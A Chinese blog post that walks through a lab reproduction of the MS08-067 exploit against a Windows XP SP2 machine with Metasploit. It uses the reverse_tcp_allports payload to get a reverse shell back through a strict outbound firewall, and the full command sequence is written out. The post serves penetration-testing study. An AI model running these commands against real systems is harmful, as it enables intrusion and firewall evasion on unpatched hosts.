全端口攻击载荷:暴力目标开放端口

已于 2023-03-26 13:46:10 修改
阅读量148 收藏
点赞数 2
分类专栏: 漏洞复现集合 文章标签: 网络 windows 服务器 系统安全 安全
于 2023-03-26 13:39:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43093288/article/details/129778085
版权

目录

此实验基于Chinese MS08067 (Simplified Chinese )漏洞复现

一、开放监听全端口意义:

在前面Chinese MS08067漏洞复现中,我们之所以能够成功,主要是由于目标主机反弹连接使用的端口(目标连接攻击机使用的端口)没有被过滤掉。但是如果我们攻击的组织内部设置了非常严格的出站端口过滤怎么办?

很多公司在防火墙上仅仅开放个别特定的端口(防火墙只允许外部主机用指定的端口连接目标),将其他端口一律关闭(用非指定端口连接则不能成功),这种情况下我们很难判定能够通过哪些端口连接到外部主机上。我们可以猜测443端口没有被防火墙禁止,同样的可能还有FTP、Telnet、SSH以及HTTP等服务使用的端口,可以逐一进行尝试。但是Metasploit已经提供了一个专用的攻击载荷帮助我们找到这些放行的端口,我们还要费力猜它做什么呢?

Metasploit的这个攻击载荷会对所有可用的端口进行尝试,直到它发现其中一个是放行的。(不过遍历整个端口号的取值范围[1-65535]会耗费相当长的时间。)下面让我们使用这个攻击载荷,让它尝试对所有端口进行连接,直到找到成功连接的端口为止。

二、靶机搭建

kali:

在这里插入图片描述

Windows XP SP2 (Simplified Chinese ):

Windows XP SP2 (Simplified Chinese )

三、漏洞利用

search ms08
use exploit/windows/smb/ms08_067_netapi 
show payloads
set payload payload/windows/meterpreter/reverse_tcp_allports 
set lhost 172.16.12.100
set rhosts 172.16.12.101
set rport 445
unset LPORT
set target 10
exploit -j

注:
(unset LPORT)不允许指定监听攻击机指定端口,将攻击机全部端口都设为监听
(exploit -j)在攻击机后台运行

sessions -l -v
sessions  -i 1

注:
(sessions -l -v)查看后台运行的进程
(sessions  -i 1)选择打开ID号为1的进行程

在这里插入图片描述

注释:请注意我们没有设置LPORT参数,而是使用allports攻击载荷在所有端口上进行监听,直到发现一个放行的端口。目标机的1047端口与我们的攻击机:1(指所有的端口)建立了连接(此为模拟现象,如为真实环境有防火墙拦截其他端口,则一般只有一个指定的端口能连接)。

shell
ipconfig

在这里插入图片描述

四、总结

本次实验我们复现了防火墙只允许在指定端口连接,我们利用Metasploit的allports攻击载荷完成代替手工测试允许端口的实验。

caicai大师
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows批处理一键开放防火墙端口.bat
03-25
Windows批处理一键开放防火墙端口
VMware vSphere所需要开放端口清单
09-30
为了确保vSphere能够正常工作,必须正确配置网络设置,包括开放特定的端口,以允许不同组件和服务之间的通信。以下是vSphere关键端口及其作用的详细说明: 1. 端口80:这是一个HTTP连接端口,vCenter Server使用它...
Metasploit学习之渗透攻击之旅
习惯积淀的博客
01-08 222
文章目录渗透攻击之旅渗透攻击基础渗透流程端口攻击载荷暴力猜解目标开放端口 渗透攻击之旅 渗透攻击基础 Metasploit框架中包含数百个模块,在MSF终端中运行show命令可以把所有模块显示出来。 命令: show exploits 显示所有可用的渗透攻击模块 show auxiliary 显示所有的辅助模块以及它们的用途 show options 显示各个模块正确运行所需的各种设置。 ...
网络安全威胁——APT攻击
聚集机器学习、信息安全
10-06 3708
高级持续性威胁(APT,Advanced Persistent Threat),又叫高级长期威胁,是一种复杂的、持续的网络攻击,本文详细介绍了APT攻击的概念、方法和典型案例。
网络攻击与防范—术语和工具介绍
qq_50860232的博客
12-29 3869
DDOS/sql注入/DDL注入/Script kiddie/肉鸡/蠕虫病毒/跨站XSS/渗透测试/提权/爆破/ARP欺骗/域名劫持/撞库/外挂/................
CentOS 7如何快速开放端口
09-15
主要为大家详细介绍了CentOS 7如何快速开放端口,如何使用firewalld开放Linux端口,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
易语言判断端口开放
08-22
易语言判断端口开放源码系统结构:端口是否开放,创建网络通讯_,网络通讯连接_,网络通讯网络转换_,网络通讯启动_,网络通讯到网络地址_,关闭网络通讯_, ======窗口程序集1 || ||------_按钮
hmallox勒索病毒科普:了解其威胁与防御策略
safe130_的博客
07-14 948
halo,.360,.faust,.2700, .eking,elbie, .wis,.mkp,.malox,.rmallox,.mallox,.hmallox, .anony, .ma1x0,.live,.carver,.locked,_locked,.locked1,.svh , lockbit, .src, .secret , .datah, .BEAST,.DevicData-P, .kat6.l6st6r 等等,:用户从非官方或不受信任的源下载软件时,可能会无意中安装带有勒索病毒的软件包。
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 672
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
vue2 实现原生 WebSocket
weixin_38797742的博客
07-11 410
原生WebSocket: new WebSocket。
【观成科技】Websocket协议代理隧道加密流量分析与检测
GCKJ_0824的博客
07-10 1017
Websocket中的掩码加密使用异或(xor)做简单的加密,当MASK字段对应位被设置为 1 时表示加密,那么后续会设置4字节的Masking-key,Mask位设置为 0 时表示不加密,则不会携带Masking-key。观成科技的安全团队通过研究Websocket协议本身结构特点,并与对应的工具流量相结合,从而提出行之有效的检测方法应用于产品当中,能在Websocket流量中准确发现异常,找出相关隧道的搭建和使用痕迹,保障客户网络安全。Websocket协议代理工具加密流量检测。
访问控制的定义与原理
SafePloy_SH的博客
07-11 330
访问控制(Access Control)是一种重要的安全机制,用于限制对程序中的数据、函数、类以及计算机系统中资源(如文件、数据库、网络设备等)的访问权限。其主要目的是保护系统中的敏感信息和资源,防止未经授权的访问和操作,确保系统的安全性、完整性和可靠性。综上所述,访问控制是保障系统安全的重要手段之一,它通过限制用户对资源的访问权限来防止未经授权的访问和操作。允许用户对自身所创建的访问对象(如文件、数据表等)进行访问,并可将对这些对象的访问权授予其他用户或收回其访问权限。
UDP协议介绍和作用
小蜜蜂vs码农
07-10 1065
UDP协议介绍和作用
防火墙实验
wxhxmj的博客
07-10 439
5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,其次登陆需要修改密码,用户过期时间设定10天,用户不允许多人使用。5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,其次登陆需要修改密码,用户过期时间设定10天,用户不允许多人使用。2、生产区不允许访问互联网,办公区和游客区允许访问互联网。
ENSP防火墙综合配置
Enjoy_zhuo的博客
07-11 189
因为ISP返回的数据包会被防火墙最后的默认安全策略给拒绝,所以,把要ISP返回的数据给允许通过。
RIP路由协议概述
张海涛的专栏
07-12 248
若该条路由在被记为16跳后,120s内还没有收到更新,则将这条路由从路由表中删除。发送路由更新时,目标地址为广播地址:255.255.255.255。路由器每隔30s从每个启动RIP协议的接口发送出路由更新信息。若一条路由在180s内没有收到更新,这条路由的跳数将记为16。发送路由更新时,目标地址为组播地址224.0.0.9。RIP是一个【距离——矢量】路由选择协议。发送路由更新时【不携带】子网掩码,属于。发送路由更新时【携带】子网掩码,属于。当路由器的更新周期为30s到来时,向邻居发送路由表。
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 250
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
windows|014】TCP协议详解
最新发布
小鹏linux的博客
07-15 931
TCP是一种面向连接的、可靠的、基于字节流的传输层通信协议。它工作在OSI模型的第四层,即传输层,为用户提供可靠的、有序的和无差错的数据传输服务。TCP协议与UDP协议是传输层的两大主要协议,但两者在设计上有明显的不同:TCP提供的是可靠的数据传输服务,而UDP则更注重传输的速度和效率
Python项目开发实战_端口扫描器的实现_编程案例解析实例详解课程教程.pdf
05-02
端口扫描是网络安全领域中的一个重要概念,通常被黑客和渗透测试人员用于探测目标系统的开放端口和服务,从而找出可能的安全漏洞。端口扫描的工作原理是向目标主机的特定端口发送请求,根据返回的响应来判断端口的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值